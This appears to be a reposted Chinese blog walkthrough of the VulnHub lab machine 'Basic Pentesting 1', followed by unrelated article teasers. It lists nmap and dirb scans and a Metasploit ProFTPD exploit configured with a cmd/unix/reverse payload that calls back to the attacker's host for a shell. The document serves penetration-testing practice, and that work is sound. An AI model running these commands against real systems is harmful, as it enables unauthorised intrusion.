vulnhub靶机：Basic penetration_1

🕗 发布于 2024-10-09 07:50 安全 网络安全 系统安全 web安全

项目地址

 https://download.vulnhub.com/basicpentesting/basic_pentesting_1.ova

开启靶机虚拟机

使用nmap进行主机发现，获取靶机IP地址

nmap 192.168.47.1-254

根据对比可知Basic penetration:1的一个ip地址为192.168.47.168

扫描Basic penetration:1的操作系统，端口及对应服务

nmap -A -p- 192.168.47.168

发现该靶机开放了21,22,80端口

目录扫描

dirb http://192.168.47.168

信息收集

访问网站

发现是apache框架

提权

msfconsole
search ProFTPD

use 5
show options

set rhosts 192.168.47.168
set payload cmd/unix/reverse
set lhost 192.168.47.129
run

查看当前用户

提权成功

原文地址：https://blog.csdn.net/weixin_68416970/article/details/142764710

免责声明：本站文章内容转载自网络资源，如本站内容侵犯了原著者的合法权益，可联系本站删除。更多内容请关注自学内容网（zxcms.com）！

win10 提示pl2303hxa已停产，请联系供货商解决方案
需要下载老版的驱动，下载地址：https://www.pcsoft.com.cn/soft/211569.html。
阅读更多2024-10-09
基于贝叶斯决策的 CAD 程序设计方案
本文旨在探讨贝叶斯决策在CAD程序设计中的应用，介绍贝叶斯决策的基本原理和方法，并探讨如何将其应用于CAD系统的设计过程中。我们将深入研究贝叶斯网络模型的建立、数据搜集、推断和决策等关键步骤，以及如何
阅读更多2024-10-09
【自动化测试】任务1：商品品牌
根据系统管理员—商品信息—商品品牌—测试用例，采用自动化测试，分别使用Python+Selenium及Java+Selenium进行实现。提示：商品品牌名称输入有误，请重新输入。提示：商品品牌名称输入
阅读更多2024-10-09
【网络安全】学过编程就是黑客？
黑客，相信经常接触电脑的朋友们对这个词都不陌生，各类影视视频中黑客总是身处暗处，运筹帷幄，正是这种神秘感让我走向学习编程的道路，也正是如此让我明白黑客远没有我想象中那么“帅气”。
阅读更多2024-10-09
深度学习(7):RNN实战之人名的国籍预测
很显然对于每个编码数据的信息量都特别稀疏，所以表示效率过低，数据量大的时候会产生数据集加载慢，需要通过Embedding（嵌入）提高信息密度，将One-Hot编码的高维稀疏向量映射到一个更低维的密集向
阅读更多2024-10-09
20241008深度学习动手篇
动手学深度学习一步步整起来
阅读更多2024-10-09
JS设计模式之职责链模式：优雅地处理请求流程
在前端开发中，我们经常会遇到需要按照一定的顺序处理一系列请求或操作的情况，如果将每一步处理都硬编码在一起，会导致代码臃肿，可维护性和可扩展性都会大大降低。而职责链模式恰好提供了一种优雅的解决方案。无论
阅读更多2024-10-09
聊一下不同类型的开场白
开场白太长一般都会让人不耐烦，但有的人却矫枉过正，在面对上司、前辈的时候，生怕自己过长的开场白会使对方产生反感而遭斥责，所以不断地顾及对方的态度，这就适得其反了。的确和对方见面时，如果不先说引言,就直
阅读更多2024-10-09
、Redis 安装
【代码】、Redis 安装。
阅读更多2024-10-09
C语言测试题：文件
(2) 假设fp已正确定义为一个文件指针，d1.dat为二进制文件，请填空，以便为“读〞而翻开此文件：fp=fopen( [2] )；(6) 以下程序中用户由键盘输入一个文件名，然后输入一
阅读更多2024-10-09